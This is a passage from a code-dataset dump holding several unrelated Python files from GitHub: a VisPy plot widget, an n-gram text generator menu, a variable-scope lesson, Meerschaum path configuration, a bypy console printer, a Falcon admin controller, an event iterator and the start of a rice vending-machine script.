controller\r\n self.controller.sig_logging.connect(self.s_is_logging)\r\n \r\n self.is_docked = True\r\n self.app_qt = self.controller.qt_app\r\n\r\n self.p_id = p_id\r\n self.comp_name = comp_name\r\n \r\n self.canvas = scene.SceneCanvas(bgcolor=\"#1b1d23\", keys='interactive', vsync=True)\r\n self.canvas.native.setMinimumSize(QSize(300, 150))\r\n \r\n QPyDesignerCustomWidgetCollection.registerCustomWidget(PlotWidget, module=\"PlotWidget\")\r\n loader = QUiLoader()\r\n plot_widget = loader.load(\"HSD_GUI\\GUI\\plot_widget.ui\", parent)\r\n title_frame = plot_widget.frame_plot.findChild(QFrame,\"frame_title\")\r\n contents_frame = plot_widget.frame_plot.findChild(QFrame,\"frame_contents\")\r\n pushButton_pop_out = title_frame.findChild(QPushButton, \"pushButton_pop_out\")\r\n pushButton_pop_out.clicked.connect(self.clicked_pop_out_button)\r\n \r\n #Main layout\r\n main_layout = QVBoxLayout()\r\n self.setLayout(main_layout)\r\n main_layout.addWidget(plot_widget)\r\n\r\n title_frame.layout().addWidget(MyPlotLabel(\"{}\".format(self.comp_name)))\r\n \r\n contents_frame.layout().addWidget(self.canvas.native)\r\n \r\n grid = self.canvas.central_widget.add_grid(spacing=0)\r\n self.viewbox = grid.add_view(row=0, col=1, camera='panzoom')\r\n\r\n # add the axes\r\n x_axis = scene.AxisWidget(orientation='bottom')\r\n x_axis.stretch = (1, 0.1)\r\n x_axis.axis.axis_width = x_axis.axis.tick_width = 1\r\n x_axis.axis.text_color = '#1b1d23' #same as background (hide text)\r\n x_axis.axis.axis_color = '#d2d2d2'\r\n x_axis.axis.tick_color = '#666666'\r\n grid.add_widget(x_axis, row=1, col=1)\r\n x_axis.link_view(self.viewbox)\r\n y_axis = scene.AxisWidget(orientation='left')\r\n y_axis.stretch = (0.1, 1)\r\n 
y_axis.axis.axis_width = y_axis.axis.tick_width = 1\r\n y_axis.axis.text_color = '#d2d2d2'\r\n y_axis.axis.axis_color = '#d2d2d2'\r\n y_axis.axis.tick_color = '#666666'\r\n grid.add_widget(y_axis, row=0, col=0)\r\n y_axis.link_view(self.viewbox)\r\n\r\n self.positions = dict()\r\n self._data = dict() # dict of queues\r\n\r\n self.update_plots_ui(odr, time_window, n_curves)\r\n\r\n self.updateTimer = app.Timer() # Setting up the timer to update UI\r\n self.updateTimer.connect(self.update_plot)\r\n\r\n def update_plots_ui(self, odr, time_window, n_curves): \r\n \r\n self.positions = dict()\r\n self._data = dict() # dict of queues\r\n self.curves = dict()\r\n\r\n self.n_curves = n_curves\r\n\r\n self.downsampling_factor = 1\r\n self.samples_cnt = int(odr * time_window)\r\n digits = int(math.log10(self.samples_cnt))+1\r\n \r\n #Downsampling based on sensor ODR and time_window (Max plottable point in a time_window = 9999)\r\n if digits > 4:\r\n self.downsampling_factor = 10**(digits-4)\r\n self.N = int(self.samples_cnt/self.downsampling_factor)\r\n\r\n self.color = dict()\r\n # color arrays\r\n for i in range(n_curves):\r\n self.color[i] = np.ones((self.N, 4), dtype=np.float32)\r\n self.color[i][:, 0] = np.linspace((i/self.n_curves), ((i+1)/self.n_curves), self.N)\r\n self.color[i][:, 1] = self.color[i][::-1, 0]\r\n\r\n # add a line plot inside the viewbox\r\n for i in range(self.n_curves):\r\n self._data[i] = deque(maxlen=self.N)\r\n self.positions[i] = np.zeros((self.N, 2), dtype='f')#self._dtype_from_data_type(data_type))\r\n x_lim = [0., self.N]\r\n self.positions[i][:, 0] = np.linspace(x_lim[0], x_lim[1], self.N)\r\n\r\n self.curves[i] = scene.Line(self.positions[i], self.color[i], method='gl', parent=self.viewbox.scene)\r\n #TODO TEST\r\n self.app_qt.processEvents()\r\n\r\n #TODO use FS\r\n self.min_d = 0\r\n self.max_d = 10 \r\n self.viewbox.camera.set_range(x = (0,int(self.N)), y =(self.min_d,self.max_d))\r\n\r\n self.update()\r\n\r\n @Slot()\r\n def clicked_pop_out_button(self):\r\n if self.is_docked:\r\n self.pop_out_widget()\r\n self.is_docked = False\r\n else:\r\n self.pop_in_widget()\r\n self.is_docked = True\r\n\r\n @Slot(bool)\r\n def s_is_logging(self, state: bool):\r\n print(\"sensor\", self.comp_name, \"is_logging\", state)\r\n if state:\r\n self.updateTimer.start(0)\r\n else:\r\n self.updateTimer.stop()\r\n\r\n def reset(self):\r\n pass\r\n # self._data = deque(maxlen=self._window_size)\r\n\r\n # for c in self._curves:\r\n # self._plot.removeItem(c)\r\n\r\n # self._curves = []\r\n\r\n # for i in range(self.n_curves):\r\n # self._curves.append(self._plot.plot(pen=pg.mkPen(self.colors[i % len(self.colors)], width=1),connect='auto'))\r\n # self._curves[i].setDownsampling(auto=True, method='peak')\r\n # self._curves[i].setClipToView(True)\r\n\r\n def update_plot(self, ev): \r\n if len(self._data[0]) > 0:\r\n max_d_now = []\r\n min_d_now = []\r\n for i in range(self.n_curves):\r\n if len(self._data[i]) < self.N:\r\n a = self.positions[i][:(self.N - len(self._data[i])),1]\r\n self.positions[i][:, 1] = np.append(a,np.array(self._data[i]))\r\n else: \r\n self.positions[i][:, 1] = np.array(self._data[i])\r\n\r\n self.curves[i].set_data(pos=self.positions[i], color=self.color[i])\r\n \r\n #TODO to be improved\r\n min_d_now.append(np.amin(self.positions[i][:, 1]))\r\n max_d_now.append(np.amax(self.positions[i][:, 1]))\r\n \r\n max_data = np.amax(max_d_now)\r\n min_data = np.amin(min_d_now)\r\n if min_data < self.min_d:\r\n self.viewbox.camera.set_range(x=(0,self.N),y=(min_data, 
self.max_d))\r\n self.min_d = min_data\r\n if max_data > self.max_d:\r\n self.viewbox.camera.set_range(x=(0,self.N),y=(self.min_d, max_data))\r\n self.max_d = max_data\r\n \r\n self.app_qt.processEvents()\r\n\r\n def add_data(self, data):\r\n # if len(data) > 0:\r\n for i in range(self.n_curves):\r\n # Downsampling for PLOTs\r\n self._data[i].extend(data[i][0:data[i].size:self.downsampling_factor])\r\n\r\n def closeEvent(self, event):\r\n # Re-dock the widget into its parent layout before accepting the close event\r\n self.pop_in_widget()\r\n self.is_docked = True\r\n event.accept()\r\n\r\n def pop_out_widget(self):\r\n self.setWindowFlags(Qt.Dialog)\r\n center = QScreen.availableGeometry(QApplication.primaryScreen()).center()\r\n geo = self.frameGeometry()\r\n geo.moveCenter(center)\r\n self.move(geo.topLeft())\r\n self.show()\r\n\r\n def pop_in_widget(self):\r\n self.setWindowFlags(Qt.Widget)\r\n self.parent.layout().insertWidget(self.p_id, self)","repo_name":"dmelpi/eai-polimi","sub_path":"contrib/DATA_Analysis/Vespucci/HSD_GUI/PlotWidget.py","file_name":"PlotWidget.py","file_ext":"py","file_size_in_byte":9019,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"}
+{"seq_id":"8081493841","text":"from lm import LanguageModel\nfrom text_preprocessing import TextPrepocessing\n\nimport re\nimport os\n\n# Necessary for unit-tests\ndef get_input(text):\n return input(text)\n\n# Necessary for unit-tests\ndef main():\n pass\n\nclass Main():\n program_is_over = False\n\n @property\n def language_model(self):\n return self.__language_model\n @language_model.setter\n def language_model(self, language_model):\n self.__language_model = language_model\n\n def __init__(self):\n print(\"Main instance created\")\n\n # Check entered int value\n def enter_int_number(self):\n while True:\n user_input = get_input(\"Please, enter an intager number:\\n\")\n try:\n value = int(user_input)\n if (value > 0):\n return value\n else:\n print(\"Entered number is negative\")\n except ValueError:\n print(\"Entered incorrect input\")\n\n # Present information about functionality of the program\n def present_options(self):\n print(\"\\nEnter the number of row for desired operation.\")\n print(\"For generating text, first of all you should create language model. \\n\")\n print(\"1. Create a new language model\")\n print(\"2. Generate a text from the language model, and print it to the screen\")\n print(\"3. Generate a user-specified number of texts from the language model, and write them to a file\")\n print(\"4. Create a new language model with smoothing\")\n print(\"5. Exit the program \\n\")\n\n # \"Switch\" imitation\n def choose_option(self):\n entered_option_number = self.enter_int_number()\n switcher = {\n 1: self.create_language_model,\n 2: self.generate_text,\n 3: self.generate_text_and_save,\n 4: self.create_language_model_with_smoothing,\n 5: self.exit_the_program\n }\n func = switcher.get(entered_option_number, self.option_does_not_exist)\n \n return func()\n \n def create_language_model(self, smoothing = False):\n print(\"\\nCreating a language model\")\n print(\"Enter the number for N-parameter\")\n n_parameter = self.enter_int_number()\n\n if(n_parameter > 10 or n_parameter <= 1):\n print(\"n-parameter is invalid. Please, enter the value less than 10 and more than 1.\")\n return\n\n self.language_model = LanguageModel(n_parameter)\n if smoothing:\n self.language_model.turn_on_smoothing() \n\n valid_file_path = self.find_file()\n\n with open(valid_file_path, \"r\") as openedFile:\n full_text = openedFile.read()\n text_preprocessing = TextPrepocessing(full_text)\n tokens = text_preprocessing.start_preprocessing() \n self.language_model.train(tokens)\n\n def find_file(self):\n try:\n print(\"\\nEnter the file-path with text for training the language model.\")\n print(\"Or enter \\\"NONE\\\" or \\\"none\\\" (without \\\"\\\") or just press \\\"Enter\\\" key for reading train_shakespeare.txt from the same directory with main.py\")\n entered_file_path = input()\n if (entered_file_path == \"NONE\" or entered_file_path == \"none\" or entered_file_path == \"\"): \n # Read the default file from the same directory, if NONE entered \n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n entered_file_path = __location__.replace('\\\\', '/') + \"/train_shakespeare.txt\" \n else:\n # Read file from the entered file-path\n entered_file_path = entered_file_path.replace('\\\\', '/') \n\n with open(entered_file_path, \"r\") as openedFile:\n print(\"\\nFile succesfully found \\n\")\n\n return entered_file_path \n except FileNotFoundError as ex:\n print(\"File not found. 
Please, try one more time\")\n self.find_file()\n\n def generate_text(self, intered_text = None):\n try:\n if (self.language_model == None):\n raise AttributeError()\n print(\"Enter desired begining of the text\")\n print(\"Or enter \\\"NONE\\\" or \\\"none\\\" (without \\\"\\\") or just press \\\"Enter\\\" key for generating random text\")\n entered_begining = input()\n generated_text = \"\"\n if (entered_begining != \"NONE\" or entered_begining != \"none\" or entered_begining != \"\"):\n generated_text = self.language_model.generate(entered_begining.split()) \n else:\n generated_text = self.language_model.generate()\n\n if generated_text != None:\n print(\"\\nGenerated text:\")\n print(generated_text)\n else:\n print(\"\\nUnfortunately with this beginning nothing was found\")\n \n except AttributeError:\n print(\"\\nIt is necessary first of all create a language model (option 1)\")\n self.create_language_model()\n\n def generate_text_and_save(self):\n print(\"\\nEnter desired number of texts\")\n entered_number_of_texts = self.enter_int_number()\n if (entered_number_of_texts > 0 and entered_number_of_texts < 1000):\n print(\"Writing texts to a file has started\")\n __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n file_in_root_folder = __location__.replace('\\\\', '/') + \"/new_shakespeare.txt\" \n with open(file_in_root_folder, \"w\") as created_file:\n i = 1\n while i in range(0, entered_number_of_texts + 1):\n generated_text = self.language_model.generate()\n created_file.write(\"{0}. {1}{2}\".format(i, generated_text, \"\\n\"))\n i += 1\n print(\"Writing texts to a file has ended\")\n else:\n print(\"Entered inappropriate number\")\n self.generate_text_and_save()\n\n def create_language_model_with_smoothing(self):\n self.create_language_model(smoothing = True)\n\n def exit_the_program(self):\n print(\"\\nProgram is over.\")\n Main.program_is_over = True\n\n # If entered the not existed number of operation\n def option_does_not_exist(self):\n print(\"\\nThere is no such option. Repeat entering option number again.\\n\")\n self.choose_option() \n\n def start(self):\n while True:\n # Close program if this option picked\n if Main.program_is_over:\n break\n self.present_options()\n self.choose_option()\n\nif __name__ == \"__main__\":\n # stuff only to run when not called via 'import' here\n main = Main()\n main.start()","repo_name":"FoxGriVer/PythonLabs","sub_path":"n-gramms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"22844423566","text":"print(\"function s()\")\ndef s():\n # local\n a = 11\n b = 22\n c = 33\n print('local:', a, b, c) # 11, 22, 33\n\n# global\na = 100\nb = 200\nc = 300\n\ns()\nprint('global:', a, b, c) # 100, 200, 300\nprint()\n\n\nprint(\"\\nfunction f()\")\ndef f():\n # local\n aa = 11\n bb = 22\n print('local:', aa, bb, cc) # 11, 22, 300 (c is global variable)\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nf()\nprint('global:', aa, bb, cc) # 100, 200, 300\n\n\nprint(\"\\nfunction ss()\")\ndef ss(aa, bb, cc):\n # local\n print('local:', aa, bb, cc)\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nss(aa, bb, cc) # параметри, що передаються у ф-ію, автоматично стають локальними змінними всередині ф-ії\nprint('global:', aa, bb, cc)\n\n\n\nprint(\"\\nfunction sss()\")\ndef sss(aa, bb, cc):\n # local\n print(id(aa)) # aa - is global\n aa = 20\n print(id(aa)) # aa - is local now\n print('local:', aa, bb, cc) # local: 20 200 300\n\n# global\naa = 100\nbb = 200\ncc = 300\n\nsss(aa, bb, cc) # параметри, що передаються у ф-ію, автоматично стають локальними змінними всередині ф-ії\nprint('global:', aa, bb, cc) # global: 100 200 300\nprint(id(aa))\n","repo_name":"SvitlanaPY/Python_tasks","sub_path":"Func/Func_Rules/Obl_Vydym_local_global.py","file_name":"Obl_Vydym_local_global.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"19680241218","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n\n\"\"\"\nDefine file paths\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom pathlib import Path\nimport os, platform, sys, json\nfrom meerschaum.utils.typing import Union\nfrom meerschaum.config.static import STATIC_CONFIG\n\nDOT_CONFIG_DIR_PATH = Path(\n os.environ.get('XDG_CONFIG_HOME', Path.home() / '.config')\n if platform.system() != 'Windows'\n else os.environ.get('AppData', Path.home() / 'AppData' / 'Roaming')\n)\n\nDEFAULT_ROOT_DIR_PATH = (\n (DOT_CONFIG_DIR_PATH / 'meerschaum')\n if platform.system() != 'Windows'\n else (DOT_CONFIG_DIR_PATH / 'Meerschaum')\n)\n\n\nENVIRONMENT_ROOT_DIR = STATIC_CONFIG['environment']['root']\nif ENVIRONMENT_ROOT_DIR in os.environ:\n _ROOT_DIR_PATH = Path(os.environ[ENVIRONMENT_ROOT_DIR]).resolve()\n if not _ROOT_DIR_PATH.exists():\n print(\n f\"Invalid root directory '{str(_ROOT_DIR_PATH)}' set for \" +\n f\"environment variable '{ENVIRONMENT_ROOT_DIR}'.\\n\" +\n f\"Please enter a valid path for {ENVIRONMENT_ROOT_DIR}.\",\n file = sys.stderr,\n )\n sys.exit(1)\nelse:\n _ROOT_DIR_PATH = DEFAULT_ROOT_DIR_PATH\n\nENVIRONMENT_PLUGINS_DIR = STATIC_CONFIG['environment']['plugins']\nif ENVIRONMENT_PLUGINS_DIR in os.environ:\n try:\n PLUGINS_DIR_PATHS = (\n [\n Path(path).resolve()\n for path in json.loads(os.environ[ENVIRONMENT_PLUGINS_DIR])\n ] if os.environ[ENVIRONMENT_PLUGINS_DIR].lstrip().startswith('[')\n else [\n Path(path_str).resolve()\n for path_str in os.environ[ENVIRONMENT_PLUGINS_DIR].split(':')\n if path_str\n ]\n )\n except Exception as e:\n PLUGINS_DIR_PATHS = []\n\n if not PLUGINS_DIR_PATHS:\n print(\n \"Invalid plugins directories set for \"\n f\"environment variable '{ENVIRONMENT_PLUGINS_DIR}'.\\n\\n\"\n f\"Set this to a colon-separated path string:\\n\\n\"\n f\"`export {ENVIRONMENT_PLUGINS_DIR}=./plugins:/another/path/to/plugins`\\n\\n\"\n \"or a JSON-encoded path list:\\n\\n\"\n f\"`export {ENVIRONMENT_PLUGINS_DIR}=\" + \"'[\\\"./plugins\\\", \\\"/another/path/to/plugins\\\"]'`\"\n f\"\",\n )\n sys.exit(1)\nelse:\n PLUGINS_DIR_PATHS = [_ROOT_DIR_PATH / 'plugins']\n\n### Remove duplicate plugins paths.\n_seen_plugins_paths, _plugins_paths_to_remove = set(), set()\nfor _plugin_path in PLUGINS_DIR_PATHS:\n if _plugin_path in _seen_plugins_paths:\n _plugins_paths_to_remove.add(_plugin_path)\n _seen_plugins_paths.add(_plugin_path)\nfor _plugin_path in _plugins_paths_to_remove:\n PLUGINS_DIR_PATHS.remove(_plugin_path)\n\n\npaths = {\n 'PACKAGE_ROOT_PATH' : str(Path(__file__).parent.parent.resolve()),\n 'ROOT_DIR_PATH' : str(_ROOT_DIR_PATH),\n 'VIRTENV_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'venvs'),\n 'CONFIG_DIR_PATH' : ('{ROOT_DIR_PATH}', 'config'),\n 'DEFAULT_CONFIG_DIR_PATH' : ('{ROOT_DIR_PATH}', 'default_config'),\n 'PATCH_DIR_PATH' : ('{ROOT_DIR_PATH}', 'patch_config'),\n 'PERMANENT_PATCH_DIR_PATH' : ('{ROOT_DIR_PATH}', 'permanent_patch_config'),\n 'INTERNAL_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', '.internal'),\n\n 'STACK_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'stack'),\n 'STACK_COMPOSE_FILENAME' : 'docker-compose.yaml',\n 'STACK_COMPOSE_PATH' : ('{STACK_RESOURCES_PATH}', '{STACK_COMPOSE_FILENAME}'),\n 'STACK_ENV_FILENAME' : '.env',\n 'STACK_ENV_PATH' : ('{STACK_RESOURCES_PATH}', '{STACK_ENV_FILENAME}'),\n\n 'SHELL_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', ),\n 'SHELL_HISTORY_PATH' : ('{SHELL_RESOURCES_PATH}', '.mrsm_history'),\n\n 'API_RESOURCES_PATH' : ('{PACKAGE_ROOT_PATH}', 'api', 'resources'),\n 'API_STATIC_PATH' : 
('{API_RESOURCES_PATH}', 'static'),\n 'API_TEMPLATES_PATH' : ('{API_RESOURCES_PATH}', 'templates'),\n 'API_CONFIG_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'api'),\n 'API_SECRET_KEY_PATH' : ('{API_CONFIG_RESOURCES_PATH}', '.api_secret_key'),\n 'API_UVICORN_RESOURCES_PATH' : ('{API_CONFIG_RESOURCES_PATH}', 'uvicorn'),\n 'API_UVICORN_CONFIG_PATH' : ('{API_UVICORN_RESOURCES_PATH}', '.thread_config.json'),\n\n 'CACHE_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', '.cache'),\n 'PIPES_CACHE_RESOURCES_PATH' : ('{CACHE_RESOURCES_PATH}', 'pipes'),\n 'USERS_CACHE_RESOURCES_PATH' : ('{CACHE_RESOURCES_PATH}', 'users'),\n\n 'PLUGINS_RESOURCES_PATH' : ('{INTERNAL_RESOURCES_PATH}', 'plugins'),\n 'PLUGINS_INTERNAL_LOCK_PATH' : ('{INTERNAL_RESOURCES_PATH}', 'plugins.lock'),\n 'PLUGINS_ARCHIVES_RESOURCES_PATH': ('{PLUGINS_RESOURCES_PATH}', '.archives'),\n 'PLUGINS_TEMP_RESOURCES_PATH' : ('{PLUGINS_RESOURCES_PATH}', '.tmp'),\n 'PLUGINS_INIT_PATH' : ('{PLUGINS_RESOURCES_PATH}', '__init__.py'),\n\n 'SQLITE_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'sqlite'),\n 'SQLITE_DB_PATH' : ('{SQLITE_RESOURCES_PATH}', 'mrsm_local.db'),\n\n 'DUCKDB_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'duckdb'),\n 'DUCKDB_PATH' : ('{DUCKDB_RESOURCES_PATH}', 'duck.db'),\n\n 'GRAFANA_RESOURCES_PATH' : ('{STACK_RESOURCES_PATH}', 'grafana', 'resources'),\n 'GRAFANA_DATASOURCE_PATH' : (\n '{GRAFANA_RESOURCES_PATH}', 'provisioning', 'datasources', 'datasource.yaml'\n ),\n 'GRAFANA_DASHBOARD_PATH' : (\n '{GRAFANA_RESOURCES_PATH}', 'provisioning', 'dashboards', 'dashboard.yaml'\n ),\n 'MOSQUITTO_RESOURCES_PATH' : ('{STACK_RESOURCES_PATH}', 'mosquitto', 'resources'),\n 'MOSQUITTO_CONFIG_PATH' : ('{MOSQUITTO_RESOURCES_PATH}', 'mosquitto.conf'),\n\n 'PORTABLE_CHECK_READLINE_PATH' : ('{SHELL_RESOURCES_PATH}', '.readline_attempted_install'),\n\n 'DAEMON_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'jobs'),\n 'LOGS_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'logs'),\n}\n\ndef set_root(root: Union[Path, str]):\n \"\"\"Modify the value of `ROOT_DIR_PATH`.\"\"\"\n paths['ROOT_DIR_PATH'] = Path(root).resolve()\n for path_name, path_parts in paths.items():\n if isinstance(path_parts, tuple) and path_parts[0] == '{ROOT_DIR_PATH}':\n globals()[path_name] = __getattr__(path_name)\n\ndef __getattr__(name: str) -> Path:\n if name not in paths:\n if name not in globals():\n raise AttributeError(f\"Could not import '{name}'.\")\n return globals()[name]\n\n if isinstance(paths[name], (list, tuple)) and len(paths[name]) > 0:\n ### recurse through paths to create resource directories.\n parts = []\n for p in paths[name]:\n if str(p).startswith('{') and str(p).endswith('}'):\n parts.append(__getattr__(p[1:-1]))\n else:\n parts.append(p)\n path = Path(os.path.join(*parts))\n else:\n path = Path(paths[name])\n\n ### Create directories or touch files.\n if name.endswith('RESOURCES_PATH') or name == 'CONFIG_DIR_PATH':\n path.mkdir(parents=True, exist_ok=True)\n elif 'FILENAME' in name:\n path = str(path)\n\n return path\n\n","repo_name":"bmeares/Meerschaum","sub_path":"meerschaum/config/_paths.py","file_name":"_paths.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"79"}
+{"seq_id":"9542583549","text":"#!/usr/bin/env python\n# encoding: utf-8\n# PYTHON_ARGCOMPLETE_OK\n\n# from __future__ imports must occur at the beginning of the file\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport time\n\n# unify Python 2 and 3\nif sys.version_info[0] == 3:\n\traw_input = input\n\nfrom . import const\nfrom . import gvar\nfrom .printer_util import (\n\tiswindows, human_speed, human_size, human_time_short)\n\ndef colorstr(msg, fg, bg):\n\tCSI = '\\x1b['\n\tfgs = ''\n\tbgs = ''\n\tif fg >=0 and fg <= 7:\n\t\tfgs = str(fg + 30)\n\n\tif bg >= 0 and bg <=7:\n\t\tbgs = str(bg + 40)\n\n\tcs = ';'.join([fgs, bgs]).strip(';')\n\tif cs:\n\t\treturn CSI + cs + 'm' + msg + CSI + '0m'\n\telse:\n\t\treturn msg\n\ndef pr(msg):\n\tprint(msg)\n\t# we need to flush the output periodically to see the latest status\n\tnow = time.time()\n\tif now - gvar.last_stdout_flush >= const.PrintFlushPeriodInSec:\n\t\tsys.stdout.flush()\n\t\tgvar.last_stdout_flush = now\n\ndef prcolor(msg, fg, bg):\n\tif sys.stdout.isatty() and not iswindows():\n\t\tpr(colorstr(msg, fg, bg))\n\telse:\n\t\tpr(msg)\n\ndef ask(msg, enter = True):\n\tpr(msg)\n\tif enter:\n\t\tpr('Press [Enter] when you are done')\n\treturn raw_input()\n\n# print progress\n# https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console\ndef pprgr(finish, total, start_time = None, existing = 0,\n\t\tprefix = '', suffix = '', seg = 20):\n\t# we don't want this goes to the log, so we use stderr\n\tif total > 0:\n\t\tsegth = seg * finish // total\n\t\tpercent = 100 * finish // total\n\t\tcurrent_batch_percent = 100 * (finish - existing) // total\n\telse:\n\t\tsegth = seg\n\t\tpercent = 100\n\t\tcurrent_batch_percent = 0\n\n\teta = ''\n\tnow = time.time()\n\tif start_time is not None and current_batch_percent > 5 and finish > 0:\n\t\tfinishf = float(finish) - float(existing)\n\t\ttotalf = float(total)\n\t\tremainf = totalf - float(finish)\n\t\telapsed = now - start_time\n\t\tspeed = human_speed(finishf / elapsed)\n\t\teta = 'ETA: ' + human_time_short(elapsed * remainf / finishf) + \\\n\t\t\t\t' (' + speed + ', ' + \\\n\t\t\t\thuman_time_short(elapsed) + ' gone)'\n\tmsg = '\\r' + prefix + '[' + segth * '=' + (seg - segth) * '_' + ']' + \\\n\t\t\" {}% ({}/{})\".format(percent, human_size(finish, 1), human_size(total, 1)) + \\\n\t\t' ' + eta + suffix\n\t#msg = '\\r' + prefix + '[' + segth * '=' + (seg - segth) * '_' + ']' + \\\n\t#\t\" {}% ({}/{})\".format(percent, human_size(finish), human_size(total)) + \\\n\t#\t' ' + eta + suffix\n\tsys.stderr.write(msg + ' ') # space is used as a clearer\n\tsys.stderr.flush()\n\n","repo_name":"houtianze/bypy","sub_path":"bypy/printer_console.py","file_name":"printer_console.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":7130,"dataset":"github-code","pt":"79"}
+{"seq_id":"18949580729","text":"import falcon\n\nfrom pomoccore import db\nfrom pomoccore.models import User\nfrom pomoccore.models import Admin\nfrom pomoccore.utils import validators\nfrom pomoccore.utils import response\nfrom pomoccore.utils.errors import APIUnprocessableEntityError\n\n\nclass AdminByUsernameController(object):\n @falcon.before(validators.admin.username_exists)\n def on_get(self, req, resp):\n admin = db.Session.query(User).filter_by(username=req.get_json('username')).one()\n\n data = dict()\n data['admin'] = dict()\n for scope in req.scope:\n try:\n data['admin'][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the teacher.')\n\n response.set_successful_response(\n resp, falcon.HTTP_200, 'Ignacio! Where is the damn internal code?',\n 'Successful admin data retrieval', 'Admin data successfully gathered.', data\n )\n\n\nclass AdminController(object):\n @falcon.before(validators.admin.exists)\n def on_get(self, req, resp):\n data = dict()\n data['admin'] = dict()\n if req.get_json('admin_id') == '__all__':\n admins = db.Session.query(User).filter_by(user_type='admin').order_by(User.last_name.asc(),\n User.first_name.asc(),\n User.middle_name.asc(),\n User.id_number.asc()).all()\n\n row_ctr = 0\n for admin in admins:\n data['admin'][row_ctr] = dict()\n for scope in req.scope:\n try:\n if scope == 'birth_date':\n data['admin'][row_ctr][scope] = getattr(admin, scope).strftime('%B %d, %Y')\n else:\n data['admin'][row_ctr][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the admin.')\n\n row_ctr += 1\n else:\n admin = db.Session.query(Admin).filter_by(admin_id=req.get_json('admin_id')).one()\n\n data['admin'] = dict()\n for scope in req.scope:\n try:\n data['admin'][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the admin.')\n\n response.set_successful_response(\n resp, falcon.HTTP_200, 'Ignacio! Where is the damn internal code?',\n 'Successful admin data retrieval', 'Admin data successfully gathered.', data\n )\n","repo_name":"Pisay127/pomoc-core","sub_path":"pomoccore/controllers/admin_controller.py","file_name":"admin_controller.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39486011895","text":"# Lucien Lo \nfrom BEvents import BEvents\nfrom BranchBuilder import BranchBuilder\n\nclass MultiBEvents(object):\n def __init__(self, files, trees, maxEvents = -1):\n self.files = files\n self.trees = trees\n total_number_evt = sum([tree.GetEntries() for tree in self.trees])\n self.nEvents = min(total_number_evt, maxEvents) if (maxEvents > -1) else total_number_evt\n\n self.EvtClassDict = {}\n total_sum_entries = 0\n for tree in self.trees:\n total_sum_entries += tree.GetEntries()\n self.EvtClassDict[total_sum_entries] = BEvents(tree)\n self.iEvent = -1\n \n def __getitem__(self, i):\n if i >= self.nEvents:\n self.iEvent = -1\n raise IndexError(\"the index is out of range: \" + str(i))\n self.iEvent = i\n for entries in self.EvtClassDict:\n if self.iEvent < entries: break\n return self.EvtClassDict[entries]\n\n def __iter__(self):\n for self.iEvent in xrange(self.nEvents):\n for entries in self.EvtClassDict:\n if self.iEvent < entries: break\n yield self.EvtClassDict[entries]\n self.iEvent = -1\n","repo_name":"lucien1011/PyNTupleAPI","sub_path":"Events/MultiBEvents.py","file_name":"MultiBEvents.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"42229125945","text":"print(\"======== VENDING MACHINE BERAS ========\\n\")\npil = False\nwhile pil is False:\n print(\"======== Pilih Jenis Beras :\")\n print(\"1. Pandan Wangi (Rp 9.500/kg) \")\n print(\"2. Raja Lele (Rp.10.000/kg)\")\n print(\"3. Setra Ramos (Rp 9.000/kg)\")\n print(\"4. IR 42 (Rp 8.600/kg) \")\n print(\"5. Solok (Rp 9.200/kg) \")\n beras = int(input(\"(1-5): \"))\n if beras == 1:\n bname = \"Pandan Wangi\"\n price = 9500\n pil = True\n elif beras == 2:\n bname = \"Raja Lele\"\n price = 10000\n pil = True\n elif beras == 3:\n bname = \"Setra Ramos\"\n price = 9000\n pil = True\n elif beras == 4:\n bname = \"IR 42\"\n price = 8600\n pil = True\n elif beras == 5:\n bname = \"Solok\"\n price = 9200\n pil = True\n else : \n print(\"Nilai yang anda masukkan salah!\")\n print(\"Silahkan pilih kembali (1-5): \")\n pil = False\nprint(\"Anda memilih beras : \" + bname +\"\\n\")\namt = False\nwhile amt == False:\n print(\"======== Paket beras : \")\n print(\"1. 1 KG\")\n print(\"2. 5 KG\")\n print(\"3.10 KG\")\n amtCat = int(input(\"Paket beras : \")) \n if amtCat == 1:\n tot = price\n pak = \"1Kg\"\n amt = True\n elif amtCat == 2:\n tot = price * 5\n pak = \"5Kg\"\n amt = True\n elif amtCat == 3:\n tot = price * 10\n pak = 